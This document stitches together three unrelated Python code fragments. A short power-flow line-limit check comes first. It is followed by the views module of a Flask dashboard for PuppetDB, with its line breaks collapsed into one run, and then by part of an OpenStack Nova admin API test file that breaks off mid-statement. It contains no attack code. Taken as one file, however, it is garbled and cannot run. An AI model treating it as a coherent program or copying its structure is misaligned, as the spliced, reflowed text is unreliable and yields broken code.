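flow_max = (rate_a / base_mva) ** 2   # squared per-unit limit
h = (Sf * conj(Sf)).real - flow_max
print(h <= 0)                         # True -> flow within the rating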
from __future__ import absolute_import from __future__ import unicode_literals # load python 3, fallback to python 2 if it fails try: from urllib.parse import unquote, unquote_plus, quote_plus except ImportError: from urllib import unquote, unquote_plus, quote_plus # type: ignore from datetime import datetime, timedelta from itertools import tee import sys from flask import ( render_template, abort, url_for, Response, stream_with_context, request, session, jsonify ) import logging from pypuppetdb.QueryBuilder import (ExtractOperator, AndOperator, EqualsOperator, FunctionOperator, NullOperator, OrOperator, LessEqualOperator, RegexOperator) from puppetboard.forms import ENABLED_QUERY_ENDPOINTS, QueryForm from puppetboard.utils import (get_or_abort, yield_or_stop, get_db_version) from puppetboard.dailychart import get_daily_reports_chart try: import CommonMark as commonmark except ImportError: import commonmark from puppetboard.core import get_app, get_puppetdb, environments from . import __version__ REPORTS_COLUMNS = [ {'attr': 'end', 'filter': 'end_time', 'name': 'End time', 'type': 'datetime'}, {'attr': 'status', 'name': 'Status', 'type': 'status'}, {'attr': 'certname', 'name': 'Certname', 'type': 'node'}, {'attr': 'version', 'filter': 'configuration_version', 'name': 'Configuration version'}, {'attr': 'agent_version', 'filter': 'puppet_version', 'name': 'Agent version'}, ] CATALOGS_COLUMNS = [ {'attr': 'certname', 'name': 'Certname', 'type': 'node'}, {'attr': 'catalog_timestamp', 'name': 'Compile Time'}, {'attr': 'form', 'name': 'Compare'}, ] app = get_app() graph_facts = app.config['GRAPH_FACTS'] hide_facts = app.config['HIDE_FACTS_PREFIXES'] numeric_level = getattr(logging, app.config['LOGLEVEL'].upper(), None) logging.basicConfig(level=numeric_level) log = logging.getLogger(__name__) puppetdb = get_puppetdb() @app.template_global() def version(): return __version__ def stream_template(template_name, **context): app.update_template_context(context) t = app.jinja_env.get_template(template_name) rv = t.stream(context) rv.enable_buffering(5) return rv def check_env(env, envs): if env != '*' and env not in envs: abort(404) def metric_params(db_version): query_type = '' # Puppet Server is enforcing new metrics API (v2) # starting with versions 6.9.1, 5.3.12, and 5.2.13 if (db_version > (6, 9, 0) or (db_version > (5, 3, 11) and db_version < (6, 0, 0)) or (db_version > (5, 2, 12) and db_version < (5, 3, 10))): metric_version = 'v2' else: metric_version = 'v1' # Puppet DB version changed the query format from 3.2.0 # to 4.0 when querying mbeans if db_version < (4, 0, 0): query_type = 'type=default,' return query_type, metric_version @app.context_processor def utility_processor(): def now(format='%m/%d/%Y %H:%M:%S'): """returns the formated datetime""" return datetime.now().strftime(format) return dict(now=now) @app.route('/', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/') def index(env): """This view generates the index page and displays a set of metrics and latest reports on nodes fetched from PuppetDB. 
:param env: Search for nodes in this (Catalog and Fact) environment :type env: :obj:`string` """ envs = environments() metrics = { 'num_nodes': 0, 'num_resources': 0, 'avg_resources_node': 0} check_env(env, envs) if env == '*': query = app.config['OVERVIEW_FILTER'] prefix = 'puppetlabs.puppetdb.population' db_version = get_db_version(puppetdb) query_type, metric_version = metric_params(db_version) num_nodes = get_or_abort( puppetdb.metric, "{0}{1}".format(prefix, ':%sname=num-nodes' % query_type), version=metric_version) num_resources = get_or_abort( puppetdb.metric, "{0}{1}".format(prefix, ':%sname=num-resources' % query_type), version=metric_version) avg_resources_node = get_or_abort( puppetdb.metric, "{0}{1}".format(prefix, ':%sname=avg-resources-per-node' % query_type), version=metric_version) metrics['num_nodes'] = num_nodes['Value'] metrics['num_resources'] = num_resources['Value'] try: # Compute our own average because avg_resources_node['Value'] # returns a string of the format "num_resources/num_nodes" # example: "1234/9" instead of doing the division itself. metrics['avg_resources_node'] = "{0:10.0f}".format( (num_resources['Value'] / num_nodes['Value'])) except ZeroDivisionError: metrics['avg_resources_node'] = 0 else: query = AndOperator() query.add(EqualsOperator('catalog_environment', env)) num_nodes_query = ExtractOperator() num_nodes_query.add_field(FunctionOperator('count')) num_nodes_query.add_query(query) if app.config['OVERVIEW_FILTER'] is not None: query.add(app.config['OVERVIEW_FILTER']) num_resources_query = ExtractOperator() num_resources_query.add_field(FunctionOperator('count')) num_resources_query.add_query(EqualsOperator("environment", env)) num_nodes = get_or_abort( puppetdb._query, 'nodes', query=num_nodes_query) num_resources = get_or_abort( puppetdb._query, 'resources', query=num_resources_query) metrics['num_nodes'] = num_nodes[0]['count'] metrics['num_resources'] = num_resources[0]['count'] try: metrics['avg_resources_node'] = "{0:10.0f}".format( (num_resources[0]['count'] / num_nodes[0]['count'])) except ZeroDivisionError: metrics['avg_resources_node'] = 0 nodes = get_or_abort(puppetdb.nodes, query=query, unreported=app.config['UNRESPONSIVE_HOURS'], with_status=True, with_event_numbers=app.config['WITH_EVENT_NUMBERS']) nodes_overview = [] stats = { 'changed': 0, 'unchanged': 0, 'failed': 0, 'unreported': 0, 'noop': 0 } for node in nodes: if node.status == 'unreported': stats['unreported'] += 1 elif node.status == 'changed': stats['changed'] += 1 elif node.status == 'failed': stats['failed'] += 1 elif node.status == 'noop': stats['noop'] += 1 else: stats['unchanged'] += 1 if node.status != 'unchanged': nodes_overview.append(node) return render_template( 'index.html', metrics=metrics, nodes=nodes_overview, stats=stats, envs=envs, current_env=env ) @app.route('/nodes', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/nodes') def nodes(env): """Fetch all (active) nodes from PuppetDB and stream a table displaying those nodes. Downside of the streaming aproach is that since we've already sent our headers we can't abort the request if we detect an error. Because of this we'll end up with an empty table instead because of how yield_or_stop works. Once pagination is in place we can change this but we'll need to provide a search feature instead. 
:param env: Search for nodes in this (Catalog and Fact) environment :type env: :obj:`string` """ envs = environments() status_arg = request.args.get('status', '') check_env(env, envs) query = AndOperator() if env != '*': query.add(EqualsOperator("catalog_environment", env)) if status_arg in ['failed', 'changed', 'unchanged']: query.add(EqualsOperator('latest_report_status', status_arg)) elif status_arg == 'unreported': unreported = datetime.utcnow() unreported = (unreported - timedelta(hours=app.config['UNRESPONSIVE_HOURS'])) unreported = unreported.replace(microsecond=0).isoformat() unrep_query = OrOperator() unrep_query.add(NullOperator('report_timestamp', True)) unrep_query.add(LessEqualOperator('report_timestamp', unreported)) query.add(unrep_query) if len(query.operations) == 0: query = None nodelist = puppetdb.nodes( query=query, unreported=app.config['UNRESPONSIVE_HOURS'], with_status=True, with_event_numbers=app.config['WITH_EVENT_NUMBERS']) nodes = [] for node in yield_or_stop(nodelist): if status_arg: if node.status == status_arg: nodes.append(node) else: nodes.append(node) return Response(stream_with_context( stream_template('nodes.html', nodes=nodes, envs=envs, current_env=env))) def inventory_facts(): # a list of facts descriptions to go in table header headers = [] # a list of inventory fact names fact_names = [] # load the list of items/facts we want in our inventory try: inv_facts = app.config['INVENTORY_FACTS'] except KeyError: inv_facts = [('Hostname', 'fqdn'), ('IP Address', 'ipaddress'), ('OS', 'lsbdistdescription'), ('Architecture', 'hardwaremodel'), ('Kernel Version', 'kernelrelease')] # generate a list of descriptions and a list of fact names # from the list of tuples inv_facts. for desc, name in inv_facts: headers.append(desc) fact_names.append(name) return headers, fact_names @app.route('/inventory', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/inventory') def inventory(env): """Fetch all (active) nodes from PuppetDB and stream a table displaying those nodes along with a set of facts about them. :param env: Search for facts in this environment :type env: :obj:`string` """ envs = environments() check_env(env, envs) headers, fact_names = inventory_facts() return render_template( 'inventory.html', envs=envs, current_env=env, fact_headers=headers) @app.route('/inventory/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/inventory/json') def inventory_ajax(env): """Backend endpoint for inventory table""" draw = int(request.args.get('draw', 0)) envs = environments() check_env(env, envs) headers, fact_names = inventory_facts() query = AndOperator() fact_query = OrOperator() fact_query.add([EqualsOperator("name", name) for name in fact_names]) query.add(fact_query) if env != '*': query.add(EqualsOperator("environment", env)) facts = puppetdb.facts(query=query) fact_data = {} for fact in facts: skip = False for i in hide_facts: if fact.name.startswith(i): skip = True break if skip: continue if fact.node not in fact_data: fact_data[fact.node] = {} fact_data[fact.node][fact.name] = fact.value total = len(fact_data) return render_template( 'inventory.json.tpl', draw=draw, total=total, total_filtered=total, fact_data=fact_data, columns=fact_names) @app.route('/node/<node_name>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/node/<node_name>') def node(env, node_name): """Display a dashboard for a node showing as much data as we have on that node. 
This includes facts and reports but not Resources as that is too heavy to do within a single request. :param env: Ensure that the node, facts and reports are in this environment :type env: :obj:`string` """ envs = environments() check_env(env, envs) query = AndOperator() if env != '*': query.add(EqualsOperator("environment", env)) query.add(EqualsOperator("certname", node_name)) node = get_or_abort(puppetdb.node, node_name) return render_template( 'node.html', node=node, envs=envs, current_env=env, columns=REPORTS_COLUMNS[:2]) @app.route('/reports', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node_name': None}) @app.route('/<env>/reports', defaults={'node_name': None}) @app.route('/reports/<node_name>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/reports/<node_name>') def reports(env, node_name): """Query and Return JSON data to reports Jquery datatable :param env: Search for all reports in this environment :type env: :obj:`string` """ envs = environments() check_env(env, envs) return render_template( 'reports.html', envs=envs, current_env=env, node_name=node_name, columns=REPORTS_COLUMNS) @app.route('/reports/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node_name': None}) @app.route('/<env>/reports/json', defaults={'node_name': None}) @app.route('/reports/<node_name>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/reports/<node_name>/json') def reports_ajax(env, node_name): """Query and Return JSON data to reports Jquery datatable :param env: Search for all reports in this environment :type env: :obj:`string` """ draw = int(request.args.get('draw', 0)) start = int(request.args.get('start', 0)) length = int(request.args.get('length', app.config['NORMAL_TABLE_COUNT'])) paging_args = {'limit': length, 'offset': start} search_arg = request.args.get('search[value]') order_column = int(request.args.get('order[0][column]', 0)) order_filter = REPORTS_COLUMNS[order_column].get( 'filter', REPORTS_COLUMNS[order_column]['attr']) order_dir = request.args.get('order[0][dir]', 'desc') order_args = '[{"field": "%s", "order": "%s"}]' % (order_filter, order_dir) status_args = request.args.get('columns[1][search][value]', '').split('|') max_col = len(REPORTS_COLUMNS) for i in range(len(REPORTS_COLUMNS)): if request.args.get("columns[%s][data]" % i, None): max_col = i + 1 envs = environments() check_env(env, envs) reports_query = AndOperator() if env != '*': reports_query.add(EqualsOperator("environment", env)) if node_name: reports_query.add(EqualsOperator("certname", node_name)) if search_arg: search_query = OrOperator() search_query.add(RegexOperator("certname", r"%s" % search_arg)) search_query.add(RegexOperator("puppet_version", r"%s" % search_arg)) search_query.add(RegexOperator( "configuration_version", r"%s" % search_arg)) reports_query.add(search_query) status_query = OrOperator() for status_arg in status_args: if status_arg in ['failed', 'changed', 'unchanged']: arg_query = AndOperator() arg_query.add(EqualsOperator('status', status_arg)) arg_query.add(EqualsOperator('noop', False)) status_query.add(arg_query) if status_arg == 'unchanged': arg_query = AndOperator() arg_query.add(EqualsOperator('noop', True)) arg_query.add(EqualsOperator('noop_pending', False)) status_query.add(arg_query) elif status_arg == 'noop': arg_query = AndOperator() arg_query.add(EqualsOperator('noop', True)) arg_query.add(EqualsOperator('noop_pending', True)) status_query.add(arg_query) if len(status_query.operations) == 0: if 
len(reports_query.operations) == 0: reports_query = None else: reports_query.add(status_query) if status_args[0] != 'none': reports = get_or_abort( puppetdb.reports, query=reports_query, order_by=order_args, include_total=True, **paging_args) reports, reports_events = tee(reports) total = None else: reports = [] reports_events = [] total = 0 # Convert metrics to relational dict metrics = {} for report in reports_events: if total is None: total = puppetdb.total metrics[report.hash_] = {} for m in report.metrics: if m['category'] not in metrics[report.hash_]: metrics[report.hash_][m['category']] = {} metrics[report.hash_][m['category']][m['name']] = m['value'] if total is None: total = 0 return render_template( 'reports.json.tpl', draw=draw, total=total, total_filtered=total, reports=reports, metrics=metrics, envs=envs, current_env=env, columns=REPORTS_COLUMNS[:max_col]) @app.route('/report/<node_name>/<report_id>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/report/<node_name>/<report_id>') def report(env, node_name, report_id): """Displays a single report including all the events associated with that report and their status. The report_id may be the puppetdb's report hash or the configuration_version. This allows for better integration into puppet-hipchat. :param env: Search for reports in this environment :type env: :obj:`string` :param node_name: Find the reports whose certname match this value :type node_name: :obj:`string` :param report_id: The hash or the configuration_version of the desired report :type report_id: :obj:`string` """ envs = environments() check_env(env, envs) query = AndOperator() report_id_query = OrOperator() report_id_query.add(EqualsOperator("hash", report_id)) report_id_query.add(EqualsOperator("configuration_version", report_id)) if env != '*': query.add(EqualsOperator("environment", env)) query.add(EqualsOperator("certname", node_name)) query.add(report_id_query) reports = puppetdb.reports(query=query) try: report = next(reports) except StopIteration: abort(404) report.version = commonmark.commonmark(report.version) return render_template( 'report.html', report=report, events=yield_or_stop(report.events()), logs=report.logs, metrics=report.metrics, envs=envs, current_env=env) @app.route('/facts', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/facts') def facts(env): """Displays an alphabetical list of all facts currently known to PuppetDB. 
:param env: Serves no purpose for this function, only for consistency's sake :type env: :obj:`string` """ envs = environments() check_env(env, envs) facts = [] order_by = '[{"field": "name", "order": "asc"}]' facts = get_or_abort(puppetdb.fact_names) facts_columns = [[]] letter = None letter_list = None break_size = (len(facts) / 4) + 1 next_break = break_size count = 0 for fact in facts: skip = False for i in hide_facts: if fact.startswith(i): skip = True break if skip: continue count += 1 if letter != fact[0].upper() or not letter: if count > next_break: # Create a new column facts_columns.append([]) next_break += break_size if letter_list: facts_columns[-1].append(letter_list) # Reset letter = fact[0].upper() letter_list = [] letter_list.append(fact) facts_columns[-1].append(letter_list) return render_template('facts.html', facts_columns=facts_columns, envs=envs, current_env=env) @app.route('/fact/<fact>', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'value': None}) @app.route('/<env>/fact/<fact>', defaults={'value': None}) @app.route('/fact/<fact>/<value>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/fact/<fact>/<value>') def fact(env, fact, value): """Fetches the specific fact(/value) from PuppetDB and displays per node for which this fact is known. :param env: Searches for facts in this environment :type env: :obj:`string` :param fact: Find all facts with this name :type fact: :obj:`string` :param value: Find all facts with this value :type value: :obj:`string` """ envs = environments() check_env(env, envs) render_graph = False if fact in graph_facts and not value: render_graph = True value_safe = value if value is not None: value_safe = unquote_plus(value) return render_template( 'fact.html', fact=fact, value=value, value_safe=value_safe, render_graph=render_graph, envs=envs, current_env=env) @app.route('/fact/<fact>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node': None, 'value': None}) @app.route('/<env>/fact/<fact>/json', defaults={'node': None, 'value': None}) @app.route('/fact/<fact>/<value>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node': None}) @app.route('/fact/<fact>/<path:value>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'node': None}) @app.route('/<env>/fact/<fact>/<value>/json', defaults={'node': None}) @app.route('/node/<node>/facts/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'fact': None, 'value': None}) @app.route('/<env>/node/<node>/facts/json', defaults={'fact': None, 'value': None}) def fact_ajax(env, node, fact, value): """Fetches the specific facts matching (node/fact/value) from PuppetDB and return a JSON table :param env: Searches for facts in this environment :type env: :obj:`string` :param node: Find all facts for this node :type node: :obj:`string` :param fact: Find all facts with this name :type fact: :obj:`string` :param value: Filter facts whose value is equal to this :type value: :obj:`string` """ draw = int(request.args.get('draw', 0)) envs = environments() check_env(env, envs) render_graph = False if fact in graph_facts and not value and not node: render_graph = True query = AndOperator() if node: query.add(EqualsOperator("certname", node)) if env != '*': query.add(EqualsOperator("environment", env)) if len(query.operations) == 0: query = None # Generator needs to be converted (graph / total) try: value = int(value) except ValueError: if value is not None and query is not None: query.add(EqualsOperator('value', unquote_plus(value))) except TypeError: 
pass facts = [f for f in get_or_abort( puppetdb.facts, name=fact, query=query)] total = len(facts) counts = {} json = { 'draw': draw, 'recordsTotal': total, 'recordsFiltered': total, 'data': []} for fact_h in facts: skip = False for i in hide_facts: if fact_h.name.startswith(i): skip = True break if skip: continue line = [] if not fact: line.append(fact_h.name) if not node: line.append('<a href="{0}">{1}</a>'.format( url_for('node', env=env, node_name=fact_h.node), fact_h.node)) if not value: fact_value = fact_h.value if isinstance(fact_value, str): fact_value = quote_plus(fact_h.value) line.append('<a href="{0}">{1}</a>'.format( url_for( 'fact', env=env, fact=fact_h.name, value=fact_value), fact_h.value)) json['data'].append(line) if render_graph: if fact_h.value not in counts: counts[fact_h.value] = 0 counts[fact_h.value] += 1 if render_graph: json['chart'] = [ {"label": "{0}".format(k).replace('\n', ' '), "value": counts[k]} for k in sorted(counts, key=lambda k: counts[k], reverse=True)] return jsonify(json) @app.route('/query', methods=('GET', 'POST'), defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/query', methods=('GET', 'POST')) def query(env): """Allows to execute raw, user created querries against PuppetDB. This is currently highly experimental and explodes in interesting ways since none of the possible exceptions are being handled just yet. This will return the JSON of the response or a message telling you what whent wrong / why nothing was returned. :param env: Serves no purpose for the query data but is required for the select field in the environment block :type env: :obj:`string` """ if not app.config['ENABLE_QUERY']: log.warn('Access to query interface disabled by administrator.') abort(403) envs = environments() check_env(env, envs) form = QueryForm(meta={ 'csrf_secret': app.config['SECRET_KEY'], 'csrf_context': session}) if form.validate_on_submit(): if form.endpoints.data not in ENABLED_QUERY_ENDPOINTS: log.warn('Access to query endpoint %s disabled by administrator.', form.endpoints.data) abort(403) if form.endpoints.data == 'pql': query = form.query.data elif form.query.data[0] == '[': query = form.query.data else: query = '[{0}]'.format(form.query.data) result = get_or_abort( puppetdb._query, form.endpoints.data, query=query) return render_template('query.html', form=form, result=result, envs=envs, current_env=env) return render_template('query.html', form=form, envs=envs, current_env=env) @app.route('/metrics', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/metrics') def metrics(env): """Lists all available metrics that PuppetDB is aware of. :param env: While this parameter serves no function purpose it is required for the environments template block :type env: :obj:`string` """ envs = environments() check_env(env, envs) db_version = get_db_version(puppetdb) query_type, metric_version = metric_params(db_version) if metric_version == 'v1': mbeans = get_or_abort(puppetdb._query, 'mbean') metrics = list(mbeans.keys()) elif metric_version == 'v2': # the list response is a dict in the format: # { # "domain1": { # "property1": { # ... # } # }, # "domain2": { # "property2": { # ... 
# } # } # } # The MBean names are the combination of the domain and the properties # with a ":" in between, example: # domain1:property1 # domain2:property2 # reference: https://jolokia.org/reference/html/protocol.html#list metrics_domains = get_or_abort(puppetdb.metric) metrics = [] # get all of the domains for domain in list(metrics_domains.keys()): # iterate over all of the properties in this domain properties = list(metrics_domains[domain].keys()) for prop in properties: # combine the current domain and each property with # a ":" in between metrics.append(domain + ':' + prop) else: raise ValueError("Unknown metric version {} for database version {}" .format(metric_version, db_version)) return render_template('metrics.html', metrics=sorted(metrics), envs=envs, current_env=env) @app.route('/metric/<path:metric>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/metric/<path:metric>') def metric(env, metric): """Lists all information about the metric of the given name. :param env: While this parameter serves no functional purpose it is required for the environments template block :type env: :obj:`string` """ envs = environments() check_env(env, envs) db_version = get_db_version(puppetdb) query_type, metric_version = metric_params(db_version) name = unquote(metric) metric = get_or_abort(puppetdb.metric, metric, version=metric_version) return render_template( 'metric.html', name=name, metric=sorted(metric.items()), envs=envs, current_env=env) @app.route('/catalogs', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'compare': None}) @app.route('/<env>/catalogs', defaults={'compare': None}) @app.route('/catalogs/compare/<compare>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/catalogs/compare/<compare>') def catalogs(env, compare): """Lists all nodes with a compiled catalog.
:param env: Find the nodes with this catalog_environment value :type env: :obj:`string` """ envs = environments() check_env(env, envs) if not app.config['ENABLE_CATALOG']: log.warning('Access to catalog interface disabled by administrator') abort(403) return render_template( 'catalogs.html', compare=compare, columns=CATALOGS_COLUMNS, envs=envs, current_env=env) @app.route('/catalogs/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT'], 'compare': None}) @app.route('/<env>/catalogs/json', defaults={'compare': None}) @app.route('/catalogs/compare/<compare>/json', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/catalogs/compare/<compare>/json') def catalogs_ajax(env, compare): """Server data to catalogs as JSON to Jquery datatables """ draw = int(request.args.get('draw', 0)) start = int(request.args.get('start', 0)) length = int(request.args.get('length', app.config['NORMAL_TABLE_COUNT'])) paging_args = {'limit': length, 'offset': start} search_arg = request.args.get('search[value]') order_column = int(request.args.get('order[0][column]', 0)) order_filter = CATALOGS_COLUMNS[order_column].get( 'filter', CATALOGS_COLUMNS[order_column]['attr']) order_dir = request.args.get('order[0][dir]', 'asc') order_args = '[{"field": "%s", "order": "%s"}]' % (order_filter, order_dir) envs = environments() check_env(env, envs) query = AndOperator() if env != '*': query.add(EqualsOperator("catalog_environment", env)) if search_arg: query.add(RegexOperator("certname", r"%s" % search_arg)) query.add(NullOperator("catalog_timestamp", False)) nodes = get_or_abort(puppetdb.nodes, query=query, include_total=True, order_by=order_args, **paging_args) catalog_list = [] total = None for node in nodes: if total is None: total = puppetdb.total catalog_list.append({ 'certname': node.name, 'catalog_timestamp': node.catalog_timestamp, 'form': compare, }) if total is None: total = 0 return render_template( 'catalogs.json.tpl', total=total, total_filtered=total, draw=draw, columns=CATALOGS_COLUMNS, catalogs=catalog_list, envs=envs, current_env=env) @app.route('/catalog/<node_name>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/catalog/<node_name>') def catalog_node(env, node_name): """Fetches from PuppetDB the compiled catalog of a given node. :param env: Find the catalog with this environment value :type env: :obj:`string` """ envs = environments() check_env(env, envs) if app.config['ENABLE_CATALOG']: catalog = get_or_abort(puppetdb.catalog, node=node_name) return render_template('catalog.html', catalog=catalog, envs=envs, current_env=env) else: log.warn('Access to catalog interface disabled by administrator') abort(403) @app.route('/catalogs/compare/<compare>...<against>', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/catalogs/compare/<compare>...<against>') def catalog_compare(env, compare, against): """Compares the catalog of one node, parameter compare, with that of with that of another node, parameter against. 
:param env: Ensure that the 2 catalogs are in the same environment :type env: :obj:`string` """ envs = environments() check_env(env, envs) if app.config['ENABLE_CATALOG']: compare_cat = get_or_abort(puppetdb.catalog, node=compare) against_cat = get_or_abort(puppetdb.catalog, node=against) return render_template('catalog_compare.html', compare=compare_cat, against=against_cat, envs=envs, current_env=env) else: log.warn('Access to catalog interface disabled by administrator') abort(403) @app.route('/radiator', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/radiator') def radiator(env): """This view generates a simplified monitoring page akin to the radiator view in puppet dashboard """ envs = environments() check_env(env, envs) if env == '*': db_version = get_db_version(puppetdb) query_type, metric_version = metric_params(db_version) query = None metrics = get_or_abort( puppetdb.metric, 'puppetlabs.puppetdb.population:%sname=num-nodes' % query_type, version=metric_version) num_nodes = metrics['Value'] else: query = AndOperator() metric_query = ExtractOperator() query.add(EqualsOperator("catalog_environment", env)) metric_query.add_field(FunctionOperator('count')) metric_query.add_query(query) metrics = get_or_abort( puppetdb._query, 'nodes', query=metric_query) num_nodes = metrics[0]['count'] nodes = puppetdb.nodes( query=query, unreported=app.config['UNRESPONSIVE_HOURS'], with_status=True ) stats = { 'changed_percent': 0, 'changed': 0, 'failed_percent': 0, 'failed': 0, 'noop_percent': 0, 'noop': 0, 'skipped_percent': 0, 'skipped': 0, 'unchanged_percent': 0, 'unchanged': 0, 'unreported_percent': 0, 'unreported': 0, } for node in nodes: if node.status == 'unreported': stats['unreported'] += 1 elif node.status == 'changed': stats['changed'] += 1 elif node.status == 'failed': stats['failed'] += 1 elif node.status == 'noop': stats['noop'] += 1 elif node.status == 'skipped': stats['skipped'] += 1 else: stats['unchanged'] += 1 try: stats['changed_percent'] = int(100 * (stats['changed'] / float(num_nodes))) stats['failed_percent'] = int(100 * stats['failed'] / float(num_nodes)) stats['noop_percent'] = int(100 * stats['noop'] / float(num_nodes)) stats['skipped_percent'] = int(100 * (stats['skipped'] / float(num_nodes))) stats['unchanged_percent'] = int(100 * (stats['unchanged'] / float(num_nodes))) stats['unreported_percent'] = int(100 * (stats['unreported'] / float(num_nodes))) except ZeroDivisionError: stats['changed_percent'] = 0 stats['failed_percent'] = 0 stats['noop_percent'] = 0 stats['skipped_percent'] = 0 stats['unchanged_percent'] = 0 stats['unreported_percent'] = 0 if ('Accept' in request.headers and request.headers["Accept"] == 'application/json'): return jsonify(**stats) return render_template( 'radiator.html', stats=stats, total=num_nodes ) @app.route('/daily_reports_chart.json', defaults={'env': app.config['DEFAULT_ENVIRONMENT']}) @app.route('/<env>/daily_reports_chart.json') def daily_reports_chart(env): """Return JSON data to generate a bar chart of daily runs. If certname is passed as GET argument, the data will target that node only. 
""" certname = request.args.get('certname') result = get_or_abort( get_daily_reports_chart, db=puppetdb, env=env, days_number=app.config['DAILY_REPORTS_CHART_DAYS'], certname=certname, ) return jsonify(result=result) @app.route('/offline/<path:filename>') def offline_static(filename): mimetype = 'text/html' if filename.endswith('.css'): mimetype = 'text/css' elif filename.endswith('.js'): mimetype = 'text/javascript' return Response(response=render_template('static/%s' % filename), status=200, mimetype=mimetype) @app.route('/status') def health_status(): return 'OK'
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for api.ec2.admin""" import datetime from nova import context from nova import db from nova import exception from nova import flags from nova import test from nova import utils from nova.api.ec2 import admin from nova.api.ec2 import ec2utils from nova.cloudpipe import pipelib from nova.compute import vm_states class AdminTestCase(test.TestCase): def setUp(self): super(AdminTestCase, self).setUp() self.stubs.Set(utils, 'vpn_ping', lambda address, port: address == '127.0.0.1') def test_user_dict(self): user = type('User', (object,), {'id': 'bob', 'access': 'foo', 'secret': 'bar'}) expected_user_dict = {'username': 'bob', 'accesskey': 'foo', 'secretkey': 'bar', 'file': 'filename'} self.assertEqual(expected_user_dict, admin.user_dict(user, 'filename')) def test_user_dict_no_file(self): user = type('User', (object,), {'id': 'bob', 'access': 'foo', 'secret': 'bar'}) expected_user_dict = {'username': 'bob', 'accesskey': 'foo', 'secretkey': 'bar', 'file': None} self.assertEqual(expected_user_dict, admin.user_dict(user)) def test_user_dict_no_user(self): self.assertEqual({}, admin.user_dict(None)) def test_project_dict(self): project = type('Project', (object,), {'id': 'project', 'project_manager_id': 'foo', 'description': 'bar'}) expected_project_dict = {'projectname': 'project', 'project_manager_id': 'foo', 'description': 'bar'} self.assertEqual(expected_project_dict, admin.project_dict(project)) def test_project_dict_no_project(self): self.assertEqual({}, admin.project_dict(None)) def test_host_dict_using_updated_at(self): # instances and volumes only used for count instances = range(2) volumes = range(3) now = datetime.datetime.now() updated_at = now - datetime.timedelta(seconds=10) compute_service = {'updated_at': updated_at} volume_service = {'updated_at': updated_at} expected_host_dict = {'hostname': 'server', 'instance_count': 2, 'volume_count': 3, 'compute': 'up', 'volume': 'up'} self.assertEqual(expected_host_dict, admin.host_dict('server', compute_service, instances, volume_service, volumes, now)) def test_host_dict_service_down_using_created_at(self): # instances and volumes only used for count instances = range(2) volumes = range(3) # service_down_time is 60 by defualt so we set to 70 to simulate # services been down now = datetime.datetime.now() created_at = now - datetime.timedelta(seconds=70) compute_service = {'created_at': created_at, 'updated_at': None} volume_service = {'created_at': created_at, 'updated_at': None} expected_host_dict = {'hostname': 'server', 'instance_count': 2, 'volume_count': 3, 'compute': 'down', 'volume': 'down'} self.assertEqual(expected_host_dict, admin.host_dict('server', compute_service, instances, volume_service, volumes, now)) def test_instance_dict(self): inst = {'name': 'this_inst', 'memory_mb': 1024, 'vcpus': 2, 
'local_gb': 500, 'flavorid': 1} expected_inst_dict = {'name': 'this_inst', 'memory_mb': 1024, 'vcpus': 2, 'disk_gb': 500, 'flavor_id': 1} self.assertEqual(expected_inst_dict, admin.instance_dict(inst)) def test_vpn_dict_state_running(self): isonow = datetime.datetime.utcnow() vpn_instance = {'id': 1, 'created_at': isonow, 'fixed_ip': {'address': '127.0.0.1'}} project = type('Project', (object,), {'id': 'project', 'vpn_ip': '127.0.0.1', 'vpn_port': 1234}) # Returns state running for 127.0.0.1 - look at class setup expected_vpn_dict = {'project_id': 'project', 'public_ip': '127.0.0.1', 'public_port': 1234, 'internal_ip': '127.0.0.1', 'instance_id': ec2utils.id_to_ec2_id(1), 'created_at': utils.isotime(isonow), 'state': 'running'} self.assertEqual(expected_vpn_dict, admin.vpn_dict(project, vpn_instance)) def test_vpn_dict_state_down(self): isonow = datetime.datetime.utcnow() vpn_instance = {'id': 1, 'created_at': isonow, 'fixed_ip': {'address': '127.0.0.1'}} project = type('Project', (object,), {'id': 'project', 'vpn_ip': '127.0.0.2', 'vpn_port': 1234}) # Returns state down for 127.0.0.2 - look at class setup vpn_dict = admin.vpn_dict(project, vpn_instance) self.assertEqual('down', vpn_dict['state']) def test_vpn_dict_invalid_project_vpn_config(self): isonow 